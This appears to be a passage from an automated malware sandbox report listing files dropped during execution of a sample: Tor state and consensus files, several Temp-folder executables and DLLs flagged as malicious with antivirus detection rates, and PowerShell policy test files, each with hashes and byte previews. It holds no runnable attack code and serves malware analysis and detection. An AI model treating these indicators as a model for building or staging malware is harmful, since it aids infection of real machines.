SHA-512:	4C862B4A401CC0E9A6AA8737BF7C2300B2F3CB015F33FA11D546A3039EA99338703D458E5C67982E207F492D9BED8FF2A399C8CA4B1F9C0977F5454F253B3415
Malicious:	false
Preview:	dir-key-certificate-version 3..fingerprint 23D15D965BC35114467363C165C4F724B64B4F66..dir-key-published 2023-09-02 14:31:55..dir-key-expires 2024-09-02 14:31:55..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAlv6XS+VppPaQzOgor0YFlcXLWeXiMn5N3VBneXuw8maLOu9oPJ9z..2/oMQN8a+VOWTf+/jebGzOBK6MamXpgsIZPQWiT18gZMsYdR8mcqBYqVP3khwUWh..9QYkV+m+Auxa0TLzTrsi6dLDJ384XdpDweU+YJghMJNZ1NqiT8ogj84hxs5Tf+Qf..bn7EBIcU7SAKr5Lw25KrMb5e3AZSC5MilBS/KLgVTq/GiWb7pKd5pxGwlGolNX8a..PccZ2ZT2DrSQsct4wVxhSbUqANI3PfMpXvmUDxWWBgbQwLF02/4gi+13snlHtqwl..y1WjE55HVfx1CTX13SStwmF/N3SFtFf1qil3j5qrHdHtKlAYOaTfqab1eLVH1l83..LI5QWD7ri9GpPqIjlh6PuaHjaO2FW20SouZtS9jJKwi1l1G3ef1tSlha1cxkRxIp..U/ngvQBsoa9X26VfQA4MieZgVVdMVwjCNh2YC9aEXc/KxfcBueZkM1194qP88cVu..dOFYaftOkuGPAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAsTgcO/j4mOopmrzOci9YXEWg9n1Dd7rFfeZcse/IV6wPbleb/Z0z..C6XQFfbtEPahRACpBbTH3fPEqSrR0wnrMzezD0jSUH6YjcKnPH3gxqcMH4rRbB0P..XrBmuCaEV0TzdorruxxKJvTTTB0Z

C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus (copy)

Process:	C:\Users\user\AppData\Local\Temp\CA65.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2866241
Entropy (8bit):	5.61172743832319
Encrypted:	false
SSDEEP:	12288:EJvx0ACyxAqyKz8FuS+ilWDgPIVAYxFy7t4UTZh2yzPpX7JC+I9ettCnPFV:EHvC73KFSrPIVDGTv2oJJKQCnP3
MD5:	1C1827E716D836338D988E92677045B3
SHA1:	87AAFD5A5E3A4EFCFA1C677408D3EF23C5881935
SHA-256:	F1F07E01D53798DDF6646E9CFFE67687D734568F9074B2FCB1F3C3888F9CBBF3
SHA-512:	C0023036D4906C129D56A01C73E00890518B8670AD21A3C13316634AAD993807346F64B3AC13BA7020725C28B722C13B56BCA3814210483368E67803FB813BFF
Malicious:	false
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-22 20:00:00.fresh-until 2023-12-22 21:00:00.valid-until 2023-12-22 23:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require

C:\Users\user\AppData\Local\Temp\4KPV6A~1\state (copy)

Process:	C:\Users\user\AppData\Local\Temp\CA65.exe
File Type:	ASCII text, with very long lines (372), with CRLF line terminators
Category:	dropped
Size (bytes):	5281
Entropy (8bit):	5.296202744096193
Encrypted:	false
SSDEEP:	96:dvaNMdSqiX3fV8J5p8HypSTDj+alWQKuL:4NMduGJwJ
MD5:	558E08AA5C1B4F35FEAD623C9671C261
SHA1:	AA0E88AFF6FEF4813F865D648D2EF2A623C38C7D
SHA-256:	91F2111F762FD27C196F9A715E7D72201FCAAE3F3747C3BE6DE6B230E17D8474
SHA-512:	E51F6F3F62ACE44CD9C8D52826B30F9F3A6C6EA759ACA1C4F03CF7052DA8A0753F74E204BCB3FDFE90B2701C6EC7D2BE5241C4FD93EEAA1DDFBE8DF692125DED
Malicious:	false
Preview:	# Tor state file last generated on 2023-12-22 21:24:42 local time..# Other times below are in UTC..# You do not need to edit this file.....CircuitBuildTimeBin 875 1..CircuitBuildTimeBin 975 1..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 1375 1..CircuitBuildTimeBin 1425 1..CircuitBuildTimeBin 1475 1..CircuitBuildTimeBin 1875 1..CircuitBuildTimeBin 2575 1..CircuitBuildTimeBin 2625 1..CircuitBuildTimeBin 3175 1..CircuitBuildTimeBin 4275 1..CircuitBuildTimeBin 13125 1..CircuitBuildTimeBin 13525 1..CircuitBuildTimeBin 13925 1..CircuitBuildTimeBin 16175 1..CircuitBuildTimeBin 16325 3..CircuitBuildTimeBin 16375 1..CircuitBuildTimeBin 16525 1..CircuitBuildTimeBin 16725 1..CircuitBuildTimeBin 16825 1..CircuitBuildTimeBin 16875 1..CircuitBuildTimeBin 17025 1..CircuitBuildTimeBin 17225 1..CircuitBuildTimeBin 18225 1..CircuitBuildTimeBin 18375 1..CircuitBuildTimeBin 18525 1..CircuitBuildTimeBin 33925 1..CircuitBuildTimeBin 50175 1..Dormant 0..Guard in=default rsa_id=205ED2C309999F0F18767A1EC

C:\Users\user\AppData\Local\Temp\4KPV6A~1\unverified-microdesc-consensus (copy)

Process:	C:\Users\user\AppData\Local\Temp\CA65.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2866241
Entropy (8bit):	5.61172743832319
Encrypted:	false
SSDEEP:	12288:EJvx0ACyxAqyKz8FuS+ilWDgPIVAYxFy7t4UTZh2yzPpX7JC+I9ettCnPFV:EHvC73KFSrPIVDGTv2oJJKQCnP3
MD5:	1C1827E716D836338D988E92677045B3
SHA1:	87AAFD5A5E3A4EFCFA1C677408D3EF23C5881935
SHA-256:	F1F07E01D53798DDF6646E9CFFE67687D734568F9074B2FCB1F3C3888F9CBBF3
SHA-512:	C0023036D4906C129D56A01C73E00890518B8670AD21A3C13316634AAD993807346F64B3AC13BA7020725C28B722C13B56BCA3814210483368E67803FB813BFF
Malicious:	false
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-22 20:00:00.fresh-until 2023-12-22 21:00:00.valid-until 2023-12-22 23:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-certs.tmp

Process:	C:\Users\user\AppData\Local\Temp\CA65.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	20852
Entropy (8bit):	6.05147791645295
Encrypted:	false
SSDEEP:	384:y/40VVq1h8PXtyd24ZFtVf1hc1xb50IU4mV91h5/ea4igBVA1hrqFU4WGYgVVdzy:oJiO962M1uxb+3jnt2a9gBSy6ddgV/TC
MD5:	07157C66A5400CA4F9A4F2399D42D50D
SHA1:	B271B0CA066E5C9C5C1907C3719BE132F0E88E7F
SHA-256:	64E8908011E96E737B7BDCC78A09D5939D7300209DCD3F4E9CEC6F012D00541D
SHA-512:	4C862B4A401CC0E9A6AA8737BF7C2300B2F3CB015F33FA11D546A3039EA99338703D458E5C67982E207F492D9BED8FF2A399C8CA4B1F9C0977F5454F253B3415
Malicious:	false
Preview:	dir-key-certificate-version 3..fingerprint 23D15D965BC35114467363C165C4F724B64B4F66..dir-key-published 2023-09-02 14:31:55..dir-key-expires 2024-09-02 14:31:55..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAlv6XS+VppPaQzOgor0YFlcXLWeXiMn5N3VBneXuw8maLOu9oPJ9z..2/oMQN8a+VOWTf+/jebGzOBK6MamXpgsIZPQWiT18gZMsYdR8mcqBYqVP3khwUWh..9QYkV+m+Auxa0TLzTrsi6dLDJ384XdpDweU+YJghMJNZ1NqiT8ogj84hxs5Tf+Qf..bn7EBIcU7SAKr5Lw25KrMb5e3AZSC5MilBS/KLgVTq/GiWb7pKd5pxGwlGolNX8a..PccZ2ZT2DrSQsct4wVxhSbUqANI3PfMpXvmUDxWWBgbQwLF02/4gi+13snlHtqwl..y1WjE55HVfx1CTX13SStwmF/N3SFtFf1qil3j5qrHdHtKlAYOaTfqab1eLVH1l83..LI5QWD7ri9GpPqIjlh6PuaHjaO2FW20SouZtS9jJKwi1l1G3ef1tSlha1cxkRxIp..U/ngvQBsoa9X26VfQA4MieZgVVdMVwjCNh2YC9aEXc/KxfcBueZkM1194qP88cVu..dOFYaftOkuGPAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAsTgcO/j4mOopmrzOci9YXEWg9n1Dd7rFfeZcse/IV6wPbleb/Z0z..C6XQFfbtEPahRACpBbTH3fPEqSrR0wnrMzezD0jSUH6YjcKnPH3gxqcMH4rRbB0P..XrBmuCaEV0TzdorruxxKJvTTTB0Z

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdesc-consensus.tmp

Process:	C:\Users\user\AppData\Local\Temp\CA65.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2866241
Entropy (8bit):	5.61172743832319
Encrypted:	false
SSDEEP:	12288:EJvx0ACyxAqyKz8FuS+ilWDgPIVAYxFy7t4UTZh2yzPpX7JC+I9ettCnPFV:EHvC73KFSrPIVDGTv2oJJKQCnP3
MD5:	1C1827E716D836338D988E92677045B3
SHA1:	87AAFD5A5E3A4EFCFA1C677408D3EF23C5881935
SHA-256:	F1F07E01D53798DDF6646E9CFFE67687D734568F9074B2FCB1F3C3888F9CBBF3
SHA-512:	C0023036D4906C129D56A01C73E00890518B8670AD21A3C13316634AAD993807346F64B3AC13BA7020725C28B722C13B56BCA3814210483368E67803FB813BFF
Malicious:	false
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-22 20:00:00.fresh-until 2023-12-22 21:00:00.valid-until 2023-12-22 23:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdescs.new

Process:	C:\Users\user\AppData\Local\Temp\CA65.exe
File Type:	ASCII text, with very long lines (15714)
Category:	modified
Size (bytes):	22235828
Entropy (8bit):	4.8138828051267755
Encrypted:	false
SSDEEP:	24576:jfqM1OXW3xUnqxzp0k0V8jxXRwQbaaQHkBb69i5WKX4E7L+0rZ5cJnEgLKrYGY98:7TRLcRhdyzbvf4WWi0Ocks8
MD5:	732BE9A9A7AC796EBDA4AB34276D9FB6
SHA1:	E4FE1DE73C5AEF57C22080655A591E66DAFBF173
SHA-256:	A7F6E0E57E86A193FCE09C7C9EEA60834B8A1C437CED724A34582F96DF1281C3
SHA-512:	DC7240AC9D27E1FB056BCBCFB3E59370DB8ECA211DAD0FA4DCC97A291EFC698CFCD1A10B6E52E85648A7B3ED83AEAA689B470869EBD970DA6C5D67BC0D1071F5
Malicious:	false
Preview:	@last-listed 2023-12-22 20:15:33.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAPGD1uuQC3GOpg1Arf7dLo+U+SIEjK8TADQu4UdSgBJitspy50IWG5gI.35RHpeNnpOSlJ5rjRrjMaNgl14mLq83kKeKZzSddOqiZFJAbdAK+22M07bDsmenF.YiVWqs+HN9vr/jTSbwV4NPetBEzAljDcM0PHGogCaKh3UF6vkzmPAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key A9it3IVYDeZ9nSBBX/KGCCEt71c1jWNmRx/Cq3ySjj0.id ed25519 AyYL+W1Vh3Fqmr2HBMbSKmiDYG1ZJLcLSHO+fsiZDNE.@last-listed 2023-12-22 20:15:33.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAOJDVyfVwJ9bT9UmHdqbARe3OH4H/mhElmU6GtUAeOpLzvjTK86vCBtN.M41i6yQrhKWfgce25skEBWa3JXMMyZjxaPqOlarDn8wy9vBUBnhRETAsMu76j+5l.niOnj8gMJgJoyX4pQjqC/hAuU1IRuXh2yNXHxAlq6HNeLJio3sdjAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key QykPCSgPeP9IEw4DCscUL3GZRUaMhrVEm/DoFTUisRU.family $83AEDBDB4BE3AD0ED91850BF1A521B843077759E $C60F0BE03DECFAEAEA0398362F985B39DAAF4A54.id ed25519 X9CsM0axASmzdDXsZdtsnifv4glUbxlparbYyhuonWA.@last-listed 2023-12-22 20:15:33.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAK6ViWiYhN3

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\state.tmp

Process:	C:\Users\user\AppData\Local\Temp\CA65.exe
File Type:	ASCII text, with very long lines (372), with CRLF line terminators
Category:	dropped
Size (bytes):	5281
Entropy (8bit):	5.296202744096193
Encrypted:	false
SSDEEP:	96:dvaNMdSqiX3fV8J5p8HypSTDj+alWQKuL:4NMduGJwJ
MD5:	558E08AA5C1B4F35FEAD623C9671C261
SHA1:	AA0E88AFF6FEF4813F865D648D2EF2A623C38C7D
SHA-256:	91F2111F762FD27C196F9A715E7D72201FCAAE3F3747C3BE6DE6B230E17D8474
SHA-512:	E51F6F3F62ACE44CD9C8D52826B30F9F3A6C6EA759ACA1C4F03CF7052DA8A0753F74E204BCB3FDFE90B2701C6EC7D2BE5241C4FD93EEAA1DDFBE8DF692125DED
Malicious:	false
Preview:	# Tor state file last generated on 2023-12-22 21:24:42 local time..# Other times below are in UTC..# You do not need to edit this file.....CircuitBuildTimeBin 875 1..CircuitBuildTimeBin 975 1..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 1375 1..CircuitBuildTimeBin 1425 1..CircuitBuildTimeBin 1475 1..CircuitBuildTimeBin 1875 1..CircuitBuildTimeBin 2575 1..CircuitBuildTimeBin 2625 1..CircuitBuildTimeBin 3175 1..CircuitBuildTimeBin 4275 1..CircuitBuildTimeBin 13125 1..CircuitBuildTimeBin 13525 1..CircuitBuildTimeBin 13925 1..CircuitBuildTimeBin 16175 1..CircuitBuildTimeBin 16325 3..CircuitBuildTimeBin 16375 1..CircuitBuildTimeBin 16525 1..CircuitBuildTimeBin 16725 1..CircuitBuildTimeBin 16825 1..CircuitBuildTimeBin 16875 1..CircuitBuildTimeBin 17025 1..CircuitBuildTimeBin 17225 1..CircuitBuildTimeBin 18225 1..CircuitBuildTimeBin 18375 1..CircuitBuildTimeBin 18525 1..CircuitBuildTimeBin 33925 1..CircuitBuildTimeBin 50175 1..Dormant 0..Guard in=default rsa_id=205ED2C309999F0F18767A1EC

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\unverified-microdesc-consensus.tmp

Process:	C:\Users\user\AppData\Local\Temp\CA65.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2866241
Entropy (8bit):	5.61172743832319
Encrypted:	false
SSDEEP:	12288:EJvx0ACyxAqyKz8FuS+ilWDgPIVAYxFy7t4UTZh2yzPpX7JC+I9ettCnPFV:EHvC73KFSrPIVDGTv2oJJKQCnP3
MD5:	1C1827E716D836338D988E92677045B3
SHA1:	87AAFD5A5E3A4EFCFA1C677408D3EF23C5881935
SHA-256:	F1F07E01D53798DDF6646E9CFFE67687D734568F9074B2FCB1F3C3888F9CBBF3
SHA-512:	C0023036D4906C129D56A01C73E00890518B8670AD21A3C13316634AAD993807346F64B3AC13BA7020725C28B722C13B56BCA3814210483368E67803FB813BFF
Malicious:	false
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-22 20:00:00.fresh-until 2023-12-22 21:00:00.valid-until 2023-12-22 23:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require

C:\Users\user\AppData\Local\Temp\CA65.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2017792
Entropy (8bit):	7.882413889771764
Encrypted:	false
SSDEEP:	49152:itCW0MSJfxkfBNec7L3jdHWNefneKAIBvxlRF1E:itz0MiOfbD79HWNeeKDtn1
MD5:	EE1049D8F8248D11080582FE27F96843
SHA1:	6701BA82ECE6878C61FCE5204DEF8EFDC28822AB
SHA-256:	F3C70EC32049139737226C85A87D453AC98C6A0FFC7747BA4F65118A1B8EF670
SHA-512:	F8DB9E2E7E0DEC1F95B83E52F67B15C0E93FCBA0801D220DB43C23D732A2BB298E986FD65493019F3FED9BBC840032FF5F5C9AE3DF6A025C596622B34757DEA6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L......c.............................Y....... ....@..........................@.......u..........................................<....@...............................................................4..@............................................text............................... ..`.data........ ......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D217.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3303032
Entropy (8bit):	7.884252286189832
Encrypted:	false
SSDEEP:	49152:e9DHOVBxoXg+WsUkS0OIQ/7ujR/dlVfOV41d46S5lo9Lo3R1VV5vSQT4UqOjMUi:egHTk7OL/a7r6Vv5lo18RN5vSJUdi
MD5:	B709E72980047F5E1E97AA351B487FFE
SHA1:	ADC1C0EBC67ED205F097E8CB698C647BF4AC1DD9
SHA-256:	EAF48C5A90A926D9245BCE676997816A635814A312BF96CEE9BF42A16806F5B5
SHA-512:	DAE1A96F7202B7B8BFAE02C0F27060514DAD08633A51742AFC37A5CFDC9F5DFADC393629A537C966F64E10FACF23C8A50DA98FB305DD80C98E06D8C938CFE7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 27%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......e.............................R4...........@...........................R.....~\|2...@...................................3.x....`O..............B2.x$...@O.........................................................<............................text............................... ..`.rdata..$=..........................@..@.data....i... ......................@....vmp..e........................... ..`.vmp..............................@....vmp..`u/......v/................. ..`.reloc.......@O......~/.............@..@.rsrc........`O......./.............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D8BF.dll

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2252800
Entropy (8bit):	7.94678659841071
Encrypted:	false
SSDEEP:	49152:Nty+RvZimcOJfAmuGcFM2/JaKCps+FokiGHB0PIRkp:zyMvMmp9cLsYXMXk
MD5:	F3E732B7020BB7C4A4F444FC1D6C6EF9
SHA1:	44C9B3C7171E0F3DD654C7C50ED04126326DC6B9
SHA-256:	5FFB3F375805FAF7235D8BF0AADB64AC9ACF086D203E233748347F21AE8B962F
SHA-512:	7DF551A8D4C436444549A602068B386F06E4F4CD9DE45EA996A2D09F4C22F22F431943A549C53022BDD9CB68990D871360F45E31A158294CD3107E6EF825C59F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 30%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]..`3..`3..`3....`3.....`3......`3......`3..;6..`3.....`3....`3.=6.`3.....`3.....`3..H.`3......`3..2...`3.....`3.....`3..`2.4`3..;1..`3..2...`3.+.0..`3..;...`3.V>6..`3.=3..`3.V>2..`3.....`3.Z...`3....`3....`3..;3.`3.=3..`3.c...`3.V>1.`3.S>0..`3..2..`3.Rich.`3.........................PE..L....:.T...........!.....0....,..F.. ........@...............................p"............@........................(................!.......................!......................................................@...............................text....&.......0.................. ..`.rdata..Sr...@.......@..............@..@.data...$b.......`..................@....qdata.......0....... ..............@...CONST...............................@....rsrc.........!.......!................@.reloc........!.......!.............@..B................................

C:\Users\user\AppData\Local\Temp\DFD5.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4576256
Entropy (8bit):	7.472554429633916
Encrypted:	false
SSDEEP:	98304:3w76twXq4owhGKPZteervC/PMne/aO9t17ItHLcfy3ETccdR:g7Gw64owhGmZLvCXMnez9tutHLcth
MD5:	47F65FC2573C54674112A6E75A27AAB0
SHA1:	EFCCFCE57B256466C69765009686F3F3CC2AAF62
SHA-256:	F34C91E4409C1477AEDF20EBF072CCE26D8353E2632169767E6EA0DB6748C592
SHA-512:	D19627D85B534A2847EFCF70059A3A7C5BED5E2EC99FE14C132A1849149B60E159ABBF54DC9A0E2C2BE44DDF7CC594FEA5C0EA2B91F009B665173190A917C15C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0...................6C..........UC.. ...`C...@.. .......................@F...........@..................................UC.K.....C.(.................... F.....9UC.............................................. ............... ..H............text....5C.. ...6C................. ..`.sdata..o....`C......:C.............@....rsrc...(.....C......BC.............@..@.reloc....... F.......E.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F6A9.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	351232
Entropy (8bit):	6.7186882513308435
Encrypted:	false
SSDEEP:	6144:iWqT8rSppL91lleFBrRpwqjuFtsf8d3v+7I7z3hf3prKXqWU:ixT8+pp5D6ZRpwqj58d3v+7I7Dov
MD5:	3D1D5C95AB6C993ACAEDBB2C719079F1
SHA1:	CAB34A16BA3E97D16B717F3E8F17FACA89DE5132
SHA-256:	B32A4963411DA33C6793BE935E2191E029E60CCE9805AA93415189177936ABCA
SHA-512:	F04422116953B10C1E76D40CEC69A5C433808C98CC2D86CCFCA840AF894C5723361BE5D249C50766C9085A98ED64483CF976E8CC125FE070298732F704C97473
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................C.......R.......D.P...............X.....M.......S.......V.....Rich............PE..L.....[c.............................!............@.................................e..........................................P.......................................................................................(............................text............................... ..`.rdata...7.......8..................@..@.data....h...@...&.................@....hihonagA............P..............@....rsrc................T..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Process:	C:\Users\user\AppData\Local\Temp\DFD5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	760320
Entropy (8bit):	6.561572491684602
Encrypted:	false
SSDEEP:	12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
MD5:	544CD51A596619B78E9B54B70088307D
SHA1:	4769DDD2DBC1DC44B758964ED0BD231B85880B65
SHA-256:	DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
SHA-512:	F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kg5zp3fd.jva.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lyvxqgsy.bk5.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfzqae3l.m4a.ps1

